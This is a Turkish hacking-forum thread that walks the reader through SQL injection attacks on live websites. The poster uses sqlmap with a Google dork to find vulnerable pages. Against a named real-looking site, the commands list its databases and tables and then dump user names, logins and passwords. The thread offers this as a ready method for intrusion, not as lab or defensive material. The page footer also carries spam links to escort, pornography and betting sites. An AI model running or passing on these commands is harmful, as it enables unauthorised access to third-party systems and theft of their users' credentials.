[rootturkhacks.com~]
duyuru LiNK KISALTMAK / TEMA VEYA SCRiPT iSTEĞiNDE BULUNMAK YASAKTIR!
duyuru GiZLi iÇERiKLERE "asdafsdfsdf" TARZI YORUM YAPMAK BAN SEBEBIDIR !
hack forum

SQLi Database Sızma

#1
SQLi Database Nedir?


SQLi: verileri yönetmek ve tasarlamak için kullanılan bir veritabanı yönetim sistemidir.
Database: bir sitenin veritabanıdır,bilgilerin kayıtların tutulduğu yerdir.

##ŞİMDİ BU VERİTABANINA NASIL GİRECEZ DİYECEKSİNİZ##

Hemen başlayalım..

Bu işin iki yolu var.

Birincisi Windowsta ;
*Havij
*Safe3 programıyla (Acunetix önerende var)

İkincisi Linux [Sanal Makine] ;
*Sqlmap
*Admin panel 

Evet bunları tanıttık ;

#İkinci Yolu göstercem size

Şimdi sanal makinemizi açalım.
Terminalimize sqlmap --help komutunu girerek,neler yapabileceğimiz bize 
listenleniyor.


[Resim: RO4n0Y.png]

sqlmap -g "dorkumuz"
Örneğin; sqlmap -g "inurl:index.php?id=" 
Not:
y evet n hayır q çıkış demektir.
bu siteye inject olmak istiyorsanız Y 
başka site isterseniz N


[Resim: ZOa9Z3.png]


Bu dorku google yapıştırsanız gene aynı sonucu alırsınız.



[Resim: d7a7y7.png]


Sıra geldi sitemize sızmak veritabanına inmek için açık.
Bu en basiti arkadaşlar sitelerimize tıklıyoruz.Açık olduğunu anlamak için
sitenin sonuna tek ' yazıp enterlıyoruz.

[Resim: JOMOPj.png]

Sitenin sonuna tırnak koyup enterladığımda bana bu site yukarda hata yazısı 
verdi,kısaca açık olduğunu anlatmak istedi peki şimdi napıyoruz.

Terminalimize su komutları giriyoruz.
sqlmap -u "www.hedefsite.com/index.php?id='" --dbs
-u url 
--dbs veritabanı 
sitenin sonuna tek tırnağı unutmayın '

Örneğin ;
sqlmap -u "http://cecit.es/news.php?id=99'" --dbs


[Resim: vJljbA.png]


Karşımıza gelenlere Y dedik ve bu geldi napcaz??
Burası artık sitenin veritabanı arkadaşlar.Şimdi tabloları ve bilgileri 
cekecez.(e-mail,phone,şifreler vs.)


[Resim: By1LLV.png]

Öncelikle tablomuzu seçelim.
Buraya dikkat.
sqlmap -u "http://cecit.es/news.php?id=99'" -D admin_cecit --tables
--tables yani tabloları aç veritabanın içindeki klasör gibi düşünün.


[Resim: ZOa9Zo.png]


[Resim: LOXbyV.png]

Tablolarımızı bulduk.Şimdi dökümanlara(Kolon) girelim neler varmış.
Hepsini dikkatlice yaparsanız mantıkgı kavrarsınız.
sqlmap -u "http://cecit.es/news.php?id=99'" -D admin_cecit -T utilisateur --columns


[Resim: Qp0V7g.png]


[Resim: XEjPXD.png]

Gördüğünüz gibi şifre,profil,nom o ne bilmiyorum xd,giriş.
Şimdi bunlar ne işime yarıyacak nasıl öğrencem felan filan cok basit arkadaşlar
--dump etmek veri çekmek diğer adı
sqlmap -u "http://cecit.es/news.php?id=99'" -D admin_cecit -T utilisateur -C nom,login,password --dump


[Resim: bLaBGj.png]

ve mutlu son.Arkadaşlar sqli injection bundan ibaret bazen şifreler olmayabilir,en son güncel girilen kayıtlar bunlar çoğunluk doğru çıkar.Zaten böyle sitelere Bypass
yiyor.Benim görevim bu kadar.


[Resim: 4G3aMq.png]
imza
Eski Kurt
Alıntı
#2
Teşekkürler
imza
Ne kadar yükselirsen, uçmayı bilmeyenlere o kadar küçük görünürsün...
Alıntı


Benzer Konular...
Konu: Yazar Cevaplar: Gösterim: Son Mesaj
Video Android Cihazı Hackleme [Webcam Sızma][Video] CyberHost 69 5,287 07-08-2020, 11:43 AM
Son Mesaj: Yoono
  İp Adresi Bilinen Pc'ye Sızma xByRamsey 1 1,754 05-07-2020, 07:18 PM
Son Mesaj: abiyeter
  Sqli Dumper Advance Sql İnjection Part 2 batchcode 4 170 05-06-2020, 07:20 AM
Son Mesaj: batchcode
  Sqli Dumper V7 Kullanımı Resimli Anlatım. Hellscream2 20 2,299 05-04-2020, 03:37 PM
Son Mesaj: MaskeliTR
  Sqli Dumper Advance Sql İnjection batchcode 4 146 05-03-2020, 08:19 PM
Son Mesaj: batchcode



Bu konuyu görüntüleyen kullanıcı(lar): 1 Ziyaretçi
brazzers premium accounts izmit escort Istanbul escort Istanbul escort istanbul escort ankara escort istanbul escort eryaman escort etimesgut escort En iyi bahis siteleri porno beylikdüzü escort avcılar escort eskişehir escort porno cami halısı taksim escort